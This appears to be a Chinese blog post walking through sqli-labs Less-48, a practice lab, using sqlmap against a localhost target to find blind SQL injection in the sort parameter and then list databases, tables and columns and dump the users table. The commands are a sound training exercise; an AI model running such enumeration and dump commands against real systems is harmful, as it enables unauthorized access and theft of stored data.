sqli-labs-Less-48

heze092026-03-17 9:17

SQLI-LAPS 实验记录

Less-48

这一关是盲注,页面上没有任何反馈信息,所以我们采用sqlmap工具来帮助进行自动化注入。

首先我们在命令行中输入sqlmap命令:

sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch

结果如图所示,有两种注入方式可选,布尔盲注和时间盲注,接下来我们继续采用sqlmap自动化注入。

sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch --dbs

结果如图所示,页面返回数据库的名称,注入有效。

之后,我们可以继续使用sqlmap注入的方式,对表名、列名等内容进行注入。

  • 爆出表名:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security --tables
  • 爆出列名:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security -T users --columns
  • 爆出内容:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-48/?sort=1 --batch -D security -T users --dump
相关推荐
早日退休!!!9 分钟前
《数据结构选型指南》笔记
数据结构·数据库·oracle
xcLeigh16 分钟前
KES数据库性能优化实战
数据库·sql·性能优化·sql优化·数据性能
阿正呀18 分钟前
Redis怎样实现本地缓存的高效失效通知
jvm·数据库·python
yoyo_zzm24 分钟前
Laravel9.x新特性全解析
数据库·mysql·nginx
2501_9012005333 分钟前
mysql如何设置InnoDB引擎参数_优化innodb_buffer_pool
jvm·数据库·python
m0_495496412 小时前
mysql处理复杂SQL性能_InnoDB优化器与MyISAM差异
jvm·数据库·python
forEverPlume2 小时前
PHP怎么使用Eloquent Attribute Composition属性组合_Laravel通过组合构建复杂属性【方法】
jvm·数据库·python
2301_809204703 小时前
mysql在docker容器中如何部署_利用docker-compose快速启动
jvm·数据库·python
虹科网络安全3 小时前
艾体宝产品|深度解读 Redis 8.4 新增功能:原子化 Slot 迁移(上)
数据库·redis·bootstrap
阿坤带你走近大数据3 小时前
怎么查看当前oracle库下的表空间temp大小或者默认大小
数据库·oracle
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档032026年4月AI大事件深度解读:大模型竞争进入“深水区“04近期有什么ai的新消息,新动态? 2026.4月05【AI】2026 年具身智能模型和世界模型总结062026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot07实测可用|小米 MiMo 百万亿 Token 免费领,开发者速冲08在Windows 11上安装Docker的踩坑记录09裂开!ChatGPT 居然开始要手机号验证,附详细解决方法10要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法